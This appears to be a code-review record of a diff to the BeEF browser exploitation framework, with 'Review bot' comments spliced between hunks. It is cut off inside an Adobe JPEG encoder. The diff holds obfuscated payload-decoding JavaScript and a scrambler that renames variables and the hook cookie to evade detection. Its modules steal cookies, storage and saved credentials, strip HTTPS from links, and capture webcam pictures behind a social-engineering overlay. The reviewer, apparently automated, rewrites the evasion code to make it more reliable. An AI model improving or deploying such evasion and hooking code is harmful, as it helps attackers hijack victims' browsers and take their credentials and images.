use atob if supported otherwise a normal base64 JS implementation (ie.: IE :-) - decode_function = 'var _0x33db=["\x61\x74\x6F\x62","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68","\x6A\x6F\x69\x6E"];function dec(_0x487fx2){if(window[_0x33db[0]]){return atob(_0x487fx2);} ;var _0x487fx3=_0x33db[1];var _0x487fx4,_0x487fx5,_0x487fx6,_0x487fx7,_0x487fx8,_0x487fx9,_0x487fxa,_0x487fxb,_0x487fxc=0,_0x487fxd=0,dec=_0x33db[2],_0x487fxe=[];if(!_0x487fx2){return _0x487fx2;} ;_0x487fx2+=_0x33db[2];do{_0x487fx7=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx8=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx9=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxa=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxb=_0x487fx7<<18|_0x487fx8<<12|_0x487fx9<<6|_0x487fxa;_0x487fx4=_0x487fxb>>16&0xff;_0x487fx5=_0x487fxb>>8&0xff;_0x487fx6=_0x487fxb&0xff;if(_0x487fx9==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4);} else {if(_0x487fxa==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5);} else {_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5,_0x487fx6);} ;} ;} while(_0x487fxc<_0x487fx2[_0x33db[6]]);;dec=_0x487fxe[_0x33db[7]](_0x33db[2]);return dec;};' - var_name = random_string(3) - input = "var #{var_name}=\"#{encoded}\";#{decode_function}[].constructor.constructor(dec(#{var_name}))();" + var_name = BeEF::Extension::Evasion::Helper::random_string(3) + input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(dec(#{var_name}))();" print_debug "[OBFUSCATION - BASE64] Javascript has been base64'ed'" input end 
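Review bot: The comment `# basically, use atob if supported otherwise a normal base64 JS implementation` is left in `execute` although the `decode_function` it described has moved to `get_bootstrap` in the base_64.rb @@ -19 hunk; move it there. `execute` now emits a call to `dec(...)` that only exists if the string returned by `get_bootstrap` was prepended by the caller, so that contract should be stated on both methods, e.g. `# @note the emitted code calls dec(), which get_bootstrap supplies; callers must prepend it once`. The enclosing class continues beyond the hunk.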
diff --git a/extensions/evasion/obfuscation/minify.rb b/extensions/evasion/obfuscation/minify.rb index ec15424d5..048d5d53b 100644 --- a/extensions/evasion/obfuscation/minify.rb +++ b/extensions/evasion/obfuscation/minify.rb @@ -19,6 +19,11 @@ module BeEF require 'jsmin' class Minify include Singleton + + def need_bootstrap + false + end + def execute(input, config) input = JSMin.minify(input) print_debug "[OBFUSCATION - MINIFIER] Javascript has been minified" diff --git a/extensions/evasion/obfuscation/scramble.rb b/extensions/evasion/obfuscation/scramble.rb index c1450ee38..d14ca5cff 100644 --- a/extensions/evasion/obfuscation/scramble.rb +++ b/extensions/evasion/obfuscation/scramble.rb 
@@ -19,28 +19,44 @@ module BeEF class Scramble include Singleton - def random_string(length=5) - chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ' - result = '' - length.times { result << chars[rand(chars.size)] } - result + def need_bootstrap + false end def execute(input, config) - to_scramble = config.get('beef.extension.evasion.to_scramble') - to_scramble.each do |var| - mod_var = random_string - input = input.gsub!(var,random_string) - print_debug "[OBFUSCATION - SCRAMBLER] string [#{var}] scrambled -> [#{mod_var}]" + @output = input - #todo: add scrambled vars to an Hash. - #todo: even better. Add them to the Configuration object, like "beef" => "cnjD3" - #@@to_scramble = config.get('beef.http.evasion.scramble_variables') - #@@scrambled = Hash.new + to_scramble = config.get('beef.extension.evasion.scramble') + to_scramble.each do |var, value| + if var == value + # Variables have not been scrambled yet + mod_var = BeEF::Extension::Evasion::Helper::random_string(3) + @output.gsub!(var,mod_var) + config.set("beef.extension.evasion.scramble.#{var}",mod_var) + print_debug "[OBFUSCATION - SCRAMBLER] string [#{var}] scrambled -> [#{mod_var}]" + else + # Variables already scrambled, re-use the one already created to maintain consistency + @output.gsub!(var,value) + print_debug "[OBFUSCATION - SCRAMBLER] string [#{var}] scrambled -> [#{value}]" + end + @output end - input - end + if config.get('beef.extension.evasion.scramble_cookies') + # ideally this should not be static, but it's static in JS code, so fine for nowend + mod_cookie = BeEF::Extension::Evasion::Helper::random_string(5) + if config.get('beef.http.hook_session_name') == "BEEFHOOK" + @output.gsub!("BEEFHOOK",mod_cookie) + config.set('beef.http.hook_session_name',mod_cookie) + print_debug "[OBFUSCATION - SCRAMBLER] cookie [BEEFHOOK] scrambled -> [#{mod_cookie}]" + else + @output.gsub!("BEEFHOOK",config.get('beef.http.hook_session_name')) + print_debug "[OBFUSCATION - SCRAMBLER] cookie [BEEFHOOK] 
scrambled -> [#{config.get('beef.http.hook_session_name')}]" + end + end + + @output + end end end end diff --git a/install-beef b/install-beef index 2669588ff..5428316c6 100644 --- a/install-beef +++ b/install-beef @@ -1,3 +1,4 @@ +#!/bin/bash # # Copyright 2012 Wade Alcorn wade@bindshell.net # diff --git a/modules/browser/get_visited_domains/config.yaml b/modules/browser/get_visited_domains/config.yaml index dfcab7cf8..ee2921948 100644 --- a/modules/browser/get_visited_domains/config.yaml +++ b/modules/browser/get_visited_domains/config.yaml @@ -22,5 +22,5 @@ beef: description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/" authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] target: - working: ["FF","IE"] - not_working: ["O","C","S"] + working: ["FF", "IE"] + not_working: ["O", "C", "S"] diff --git a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml index fb4f54fc8..8216f7223 100644 --- a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml +++ b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml @@ -17,11 +17,11 @@ beef: module: ajax_fingerprint: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Fingerprint Ajax" description: "Fingerprint Ajax and JS libraries present on the hooked page." authors: ["qswain"] target: - working: ["FF","S"] + working: ["FF", "S"] not_working: ["C"] diff --git a/modules/browser/hooked_domain/alert_dialog/config.yaml b/modules/browser/hooked_domain/alert_dialog/config.yaml index a5572a41d..2b9c05a1b 100644 --- a/modules/browser/hooked_domain/alert_dialog/config.yaml +++ b/modules/browser/hooked_domain/alert_dialog/config.yaml 
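Review bot: The scrambling loop in `execute` is a plain substring replacement: `@output.gsub!(var, mod_var)` takes a String pattern, so every occurrence of `var` is rewritten, including inside longer identifiers and string literals, and nothing checks that the 3-character name returned by `Helper::random_string(3)` differs from the other entries' replacements or is absent from the script already. When one entry's replacement happens to contain a later entry's name, that later pass rewrites it again and the mapping persisted with `config.set` no longer matches the emitted code, so I would anchor the pattern on word boundaries and reject collisions before persisting, as sketched below (assuming `to_scramble` is a Hash, which the `|var, value|` block implies). `@output = input` also aliases the caller's string, so the in-place `gsub!` calls mutate `input`; `@output = input.dup` keeps `execute` free of that side effect. The comment `# ... so fine for nowend` looks truncated and should end at `now`.
```ruby
def execute(input, config)
  @output = input.dup   # gsub! below would otherwise rewrite the caller's string

  to_scramble = config.get('beef.extension.evasion.scramble')
  to_scramble.each do |var, value|
    # match the identifier as a whole word, not as a substring of longer names or literals
    pattern = /\b#{Regexp.escape(var)}\b/
    if var == value
      # fresh name: must not be another entry's replacement, nor already occur in the script
      mod_var = nil
      loop do
        mod_var = BeEF::Extension::Evasion::Helper::random_string(3)
        break unless to_scramble.value?(mod_var) || @output.include?(mod_var)
      end
      @output.gsub!(pattern, mod_var)
      config.set("beef.extension.evasion.scramble.#{var}", mod_var)
      print_debug "[OBFUSCATION - SCRAMBLER] string [#{var}] scrambled -> [#{mod_var}]"
    else
      @output.gsub!(pattern, value)
      print_debug "[OBFUSCATION - SCRAMBLER] string [#{var}] scrambled -> [#{value}]"
    end
  end

  # … unchanged: BEEFHOOK cookie-name scrambling …
  @output
end
```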
@@ -17,7 +17,7 @@ beef:
 module:
 alert_dialog:
 enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
 name: "Create Alert Dialog"
 description: "Sends an alert dialog to the hooked browser."
 authors: ["wade", "bm"]
diff --git a/modules/browser/hooked_domain/deface_web_page/config.yaml b/modules/browser/hooked_domain/deface_web_page/config.yaml
index 22e8fdd4d..8d57a6cfe 100644
--- a/modules/browser/hooked_domain/deface_web_page/config.yaml
+++ b/modules/browser/hooked_domain/deface_web_page/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 deface_web_page:
 enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
 name: "Replace Content (Deface)"
 description: "Overwrite the page, title and shortcut icon on the hooked page."
 authors: ["antisnatchor"]
diff --git a/modules/browser/hooked_domain/get_cookie/config.yaml b/modules/browser/hooked_domain/get_cookie/config.yaml
index b535101ef..a5670e31e 100644
--- a/modules/browser/hooked_domain/get_cookie/config.yaml
+++ b/modules/browser/hooked_domain/get_cookie/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 get_cookie:
 enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
 name: "Get Cookie"
 description: "This module will retrieve the session cookie from the current page."
 authors: ["bcoles"]
diff --git a/modules/browser/hooked_domain/get_local_storage/config.yaml b/modules/browser/hooked_domain/get_local_storage/config.yaml
index 2d6d5a011..f008244b3 100644
--- a/modules/browser/hooked_domain/get_local_storage/config.yaml
+++ b/modules/browser/hooked_domain/get_local_storage/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 get_local_storage:
 enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
 name: "Get Local Storage"
 description: "Extracts data from the HTML5 localStorage object."
 authors: ["bcoles"]
diff --git a/modules/browser/hooked_domain/get_page_html/config.yaml b/modules/browser/hooked_domain/get_page_html/config.yaml
index 77e2e9109..a4e51a376 100644
--- a/modules/browser/hooked_domain/get_page_html/config.yaml
+++ b/modules/browser/hooked_domain/get_page_html/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 get_page_html:
 enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
 name: "Get Page HTML"
 description: "This module will retrieve the HTML from the current page."
 authors: ["bcoles"]
diff --git a/modules/browser/hooked_domain/get_page_links/config.yaml b/modules/browser/hooked_domain/get_page_links/config.yaml
index fd0422e2e..1b1ed13f3 100644
--- a/modules/browser/hooked_domain/get_page_links/config.yaml
+++ b/modules/browser/hooked_domain/get_page_links/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 get_page_links:
 enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
 name: "Get Page HREFs"
 description: "This module will retrieve HREFs from the target page."
 authors: ["vo"]
diff --git a/modules/browser/hooked_domain/get_session_storage/config.yaml b/modules/browser/hooked_domain/get_session_storage/config.yaml
index 417d52853..39d1cff08 100644
--- a/modules/browser/hooked_domain/get_session_storage/config.yaml
+++ b/modules/browser/hooked_domain/get_session_storage/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 get_session_storage:
 enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
 name: "Get Session Storage"
 description: "Extracts data from the HTML5 sessionStorage object."
 authors: ["bcoles"]
diff --git a/modules/browser/hooked_domain/get_stored_credentials/config.yaml b/modules/browser/hooked_domain/get_stored_credentials/config.yaml
index ad865fbc1..1c01a0391 100644
--- a/modules/browser/hooked_domain/get_stored_credentials/config.yaml
+++ b/modules/browser/hooked_domain/get_stored_credentials/config.yaml
@@ -17,7 +17,7 @@ beef: module: get_stored_credentials: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Get Stored Credentials" description: "This module retrieves saved username/password combinations from the login page on the hooked domain.

It will fail if more than one set of domain credentials are saved in the browser." authors: ["bcoles"] diff --git a/modules/browser/hooked_domain/link_rewrite/config.yaml b/modules/browser/hooked_domain/link_rewrite/config.yaml index a2420dcae..f458eb1e0 100644 --- a/modules/browser/hooked_domain/link_rewrite/config.yaml +++ b/modules/browser/hooked_domain/link_rewrite/config.yaml @@ -17,7 +17,7 @@ beef: module: link_rewrite: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Replace HREFs" description: "This module will rewrite all the href attributes of all matched links." authors: ["passbe"] diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml index ab5dbbee4..176ec2f69 100644 --- a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml +++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml @@ -17,7 +17,7 @@ beef: module: link_rewrite_sslstrip: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Replace HREFs (HTTPS)" description: "This module will rewrite all the href attributes of HTTPS links to use HTTP instead of HTTPS. Links relative to the web root are not rewritten." authors: ["bcoles"] diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml index 163bf3056..b4a20fe33 100644 --- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml +++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml 
@@ -17,10 +17,10 @@ beef:
 module:
 mobilesafari_address_spoofing:
 enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
 name: "iOS Address Bar Spoofing"
 description: "Mobile Safari iOS 5.1 Address Bar Spoofing. This is fixed in latest version of Mobile Safari (the URL turns 'blank')"
- authors: ["bcoles","xntrik","majorsecurity.net"]
+ authors: ["bcoles", "xntrik", "majorsecurity.net"]
 target:
 working:
 S:
diff --git a/modules/browser/hooked_domain/prompt_dialog/config.yaml b/modules/browser/hooked_domain/prompt_dialog/config.yaml
index 8b3f21ac4..0f9035279 100644
--- a/modules/browser/hooked_domain/prompt_dialog/config.yaml
+++ b/modules/browser/hooked_domain/prompt_dialog/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 prompt_dialog:
 enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
 name: "Create Prompt Dialog"
 description: "Sends a prompt dialog to the hooked browser."
 authors: ["wade", "bm"]
diff --git a/modules/browser/hooked_domain/replace_video/config.yaml b/modules/browser/hooked_domain/replace_video/config.yaml
index 9fb293c7e..f8ddbcda0 100644
--- a/modules/browser/hooked_domain/replace_video/config.yaml
+++ b/modules/browser/hooked_domain/replace_video/config.yaml
@@ -17,7 +17,7 @@ beef:
 module:
 replace_video:
 enable: true
- category: ["Browser","Hooked Domain"]
+ category: ["Browser", "Hooked Domain"]
 name: "Replace Videos"
 description: "Replaces an object selected with jQuery (all embed tags by default) with an embed tag containing the youtube video of your choice (rickroll by default)."
 authors: ["Yori Kvitchko", "antisnatchor"]
diff --git a/modules/browser/hooked_domain/rickroll/config.yaml b/modules/browser/hooked_domain/rickroll/config.yaml
index d8014fcc2..f86c183fa 100644
--- a/modules/browser/hooked_domain/rickroll/config.yaml
+++ b/modules/browser/hooked_domain/rickroll/config.yaml
@@ -17,7 +17,7 @@ beef: module: rickroll: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Redirect Browser (Rickroll)" description: "Overwrite the body of the page the victim is on with a full screen Rickroll." authors: ["Yori Kvitchko"] diff --git a/modules/browser/hooked_domain/site_redirect/config.yaml b/modules/browser/hooked_domain/site_redirect/config.yaml index 306c3e7a2..3c9681e0a 100644 --- a/modules/browser/hooked_domain/site_redirect/config.yaml +++ b/modules/browser/hooked_domain/site_redirect/config.yaml @@ -17,7 +17,7 @@ beef: module: site_redirect: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Redirect Browser" description: "This module will redirect the selected hooked browser to the address specified in the 'Redirect URL' input." authors: ["wade", "vo"] diff --git a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml index 9e5d349c3..ad73b2efe 100644 --- a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml +++ b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml @@ -17,7 +17,7 @@ beef: module: site_redirect_iframe: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Redirect Browser (iFrame)" description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title, page shortcut icon and the time delay are specified in the parameters below.

The content of the URL bar will not be changed in the hooked browser." authors: ["ethicalhack3r", "Yori Kvitchko"] diff --git a/modules/browser/webcam/command.js b/modules/browser/webcam/command.js new file mode 100644 index 000000000..9ed0f73a5 --- /dev/null +++ b/modules/browser/webcam/command.js @@ -0,0 +1,70 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + + +beef.execute(function() { + + /* + If you ever experience that the "Allow button" of the flash warning is not clickable, it can have several reasons: + - Some CSS/Flash bug: http://stackoverflow.com/questions/3003724/cant-click-allow-button-in-flash-on-firefox + - There is a bug in flash: http://forums.adobe.com/thread/880967 + - You overlayed (a single pixel is enough) the warning message with something (e.g. a div). Try to not include the + body_social_engineer_and_overlay below and try again. + */ + + + //The social engineering message and the overlay div's + var body_social_engineer_and_overlay = '

<%= @social_engineering_title %>

<%= @social_engineering_text %>

'; + + + //These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string + var js_functions = ''; + + + //Either do the overlay (body_social_engineer_and_overlay) or do something like in the next line (showing a message if adobe flash is not installed) + //We'll notice when flash is not installed anyway... + //var body_flash_container = '

You need FlashPlayer 9 or higher!

Get Adobe Flash player

'; + var body_flash_container = '
'; + + + //The style is the only thing we already append to the head + var theHead = document.getElementsByTagName("head")[0]; + var style = document.createElement('style'); + style.type = 'text/css'; + style.innerHTML = 'body { background: #eee; } .thingy { z-index:50; background-color:#eee; border:1px solid #eee; }'; + theHead.appendChild(style); + + //A nice library that helps us to include the swf file + var swfobject_script = '' + + //This is the javascript that actually calls the swfobject library to include the swf file + var include_script = ''; + + //Empty body first + $j('body').html(''); + //Now show our flash stuff, muahahaha + $j('body').append(js_functions, swfobject_script, body_flash_container, body_social_engineer_and_overlay, include_script); + +}); + + + + + diff --git a/modules/browser/webcam/config.yaml b/modules/browser/webcam/config.yaml new file mode 100644 index 000000000..69f3eb5fb --- /dev/null +++ b/modules/browser/webcam/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + webcam: + enable: true + category: "Browser" + name: "Webcam" + description: "This module will show the Adobe Flash 'Allow Webcam' dialog to the user. The user has to click the allow button, otherwise this module will not return pictures.
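Review bot: The operator-supplied `<%= @social_engineering_title %>` and `<%= @social_engineering_text %>` are interpolated by ERB straight into the single-quoted JavaScript string `body_social_engineer_and_overlay` (the surrounding HTML was lost in this rendering, but the quoting is visible), so a `'`, a backslash or a line break in either value terminates the literal and the whole injected script fails to parse before the Flash dialog ever appears. Since the values come from the module's own operator this is a robustness rather than a security problem, but I would still pass them as JSON-encoded JS strings and set them with jQuery's `.text()` instead of splicing them into markup, e.g. `var seTitle = <%= @social_engineering_title.to_json %>;` followed by `$j('<div/>').text(seTitle)` for the overlay, which keeps quotes and HTML out of the message; if `to_json` is not available where this template is rendered, escaping `'`, `\` and newlines on the Ruby side gives the same protection. The comment above `js_functions` says "These 4 function names" but lists five entries with `noCamera()` twice; it should name exactly the callbacks the SWF invokes, since the SWF is a binary a reader cannot grep.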
The title/text to convince the user can be customised. You can customise how many pictures you want to take and in which interval (default will take 20 pictures, 1 picture per second). The picture is sent as a base64 encoded JPG string." + authors: ["floyd @floyd_ch"] + target: + working: ["All"] diff --git a/modules/browser/webcam/dev/com/adobe/images/BitString.as b/modules/browser/webcam/dev/com/adobe/images/BitString.as new file mode 100755 index 000000000..b5c2b8410 --- /dev/null +++ b/modules/browser/webcam/dev/com/adobe/images/BitString.as 
@@ -0,0 +1,39 @@ +/* + Copyright (c) 2008, Adobe Systems Incorporated + All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + * Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + * Neither the name of Adobe Systems Incorporated nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS + IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, + THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR + PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR + CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, + EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, + PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR + PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF + LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING + NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS + SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +*/ +package com.adobe.images +{ + public class BitString + { + public var len:int = 0; + public var val:int = 0; + } +} \ No newline at end of file diff --git a/modules/browser/webcam/dev/com/adobe/images/JPGEncoder.as b/modules/browser/webcam/dev/com/adobe/images/JPGEncoder.as new file mode 100755 index 000000000..100d7e968 --- /dev/null +++ b/modules/browser/webcam/dev/com/adobe/images/JPGEncoder.as 
@@ -0,0 +1,648 @@ +/* + Copyright (c) 2008, Adobe Systems Incorporated + All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + * Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + * Neither the name of Adobe Systems Incorporated nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS + IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, + THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR + PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR + CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, + EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, + PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR + PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF + LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING + NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS + SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
+*/ +package com.adobe.images +{ + import flash.geom.*; + import flash.display.*; + import flash.utils.*; + + /** + * Class that converts BitmapData into a valid JPEG + */ + public class JPGEncoder + { + + // Static table initialization + + private var ZigZag:Array = [ + 0, 1, 5, 6,14,15,27,28, + 2, 4, 7,13,16,26,29,42, + 3, 8,12,17,25,30,41,43, + 9,11,18,24,31,40,44,53, + 10,19,23,32,39,45,52,54, + 20,22,33,38,46,51,55,60, + 21,34,37,47,50,56,59,61, + 35,36,48,49,57,58,62,63 + ]; + + private var YTable:Array = new Array(64); + private var UVTable:Array = new Array(64); + private var fdtbl_Y:Array = new Array(64); + private var fdtbl_UV:Array = new Array(64); + + private function initQuantTables(sf:int):void + { + var i:int; + var t:Number; + var YQT:Array = [ + 16, 11, 10, 16, 24, 40, 51, 61, + 12, 12, 14, 19, 26, 58, 60, 55, + 14, 13, 16, 24, 40, 57, 69, 56, + 14, 17, 22, 29, 51, 87, 80, 62, + 18, 22, 37, 56, 68,109,103, 77, + 24, 35, 55, 64, 81,104,113, 92, + 49, 64, 78, 87,103,121,120,101, + 72, 92, 95, 98,112,100,103, 99 + ]; + for (i = 0; i < 64; i++) { + t = Math.floor((YQT[i]*sf+50)/100); + if (t < 1) { + t = 1; + } else if (t > 255) { + t = 255; + } + YTable[ZigZag[i]] = t; + } + var UVQT:Array = [ + 17, 18, 24, 47, 99, 99, 99, 99, + 18, 21, 26, 66, 99, 99, 99, 99, + 24, 26, 56, 99, 99, 99, 99, 99, + 47, 66, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99 + ]; + for (i = 0; i < 64; i++) { + t = Math.floor((UVQT[i]*sf+50)/100); + if (t < 1) { + t = 1; + } else if (t > 255) { + t = 255; + } + UVTable[ZigZag[i]] = t; + } + var aasf:Array = [ + 1.0, 1.387039845, 1.306562965, 1.175875602, + 1.0, 0.785694958, 0.541196100, 0.275899379 + ]; + i = 0; + for (var row:int = 0; row < 8; row++) + { + for (var col:int = 0; col < 8; col++) + { + fdtbl_Y[i] = (1.0 / (YTable [ZigZag[i]] * aasf[row] * aasf[col] * 8.0)); + fdtbl_UV[i] = (1.0 / (UVTable[ZigZag[i]] * 
aasf[row] * aasf[col] * 8.0)); + i++; + } + } + } + + private var YDC_HT:Array; + private var UVDC_HT:Array; + private var YAC_HT:Array; + private var UVAC_HT:Array; + + private function computeHuffmanTbl(nrcodes:Array, std_table:Array):Array + { + var codevalue:int = 0; + var pos_in_table:int = 0; + var HT:Array = new Array(); + for (var k:int=1; k<=16; k++) { + for (var j:int=1; j<=nrcodes[k]; j++) { + HT[std_table[pos_in_table]] = new BitString(); + HT[std_table[pos_in_table]].val = codevalue; + HT[std_table[pos_in_table]].len = k; + pos_in_table++; + codevalue++; + } + codevalue*=2; + } + return HT; + } + + private var std_dc_luminance_nrcodes:Array = [0,0,1,5,1,1,1,1,1,1,0,0,0,0,0,0,0]; + private var std_dc_luminance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11]; + private var std_ac_luminance_nrcodes:Array = [0,0,2,1,3,3,2,4,3,5,5,4,4,0,0,1,0x7d]; + private var std_ac_luminance_values:Array = [ + 0x01,0x02,0x03,0x00,0x04,0x11,0x05,0x12, + 0x21,0x31,0x41,0x06,0x13,0x51,0x61,0x07, + 0x22,0x71,0x14,0x32,0x81,0x91,0xa1,0x08, + 0x23,0x42,0xb1,0xc1,0x15,0x52,0xd1,0xf0, + 0x24,0x33,0x62,0x72,0x82,0x09,0x0a,0x16, + 0x17,0x18,0x19,0x1a,0x25,0x26,0x27,0x28, + 0x29,0x2a,0x34,0x35,0x36,0x37,0x38,0x39, + 0x3a,0x43,0x44,0x45,0x46,0x47,0x48,0x49, + 0x4a,0x53,0x54,0x55,0x56,0x57,0x58,0x59, + 0x5a,0x63,0x64,0x65,0x66,0x67,0x68,0x69, + 0x6a,0x73,0x74,0x75,0x76,0x77,0x78,0x79, + 0x7a,0x83,0x84,0x85,0x86,0x87,0x88,0x89, + 0x8a,0x92,0x93,0x94,0x95,0x96,0x97,0x98, + 0x99,0x9a,0xa2,0xa3,0xa4,0xa5,0xa6,0xa7, + 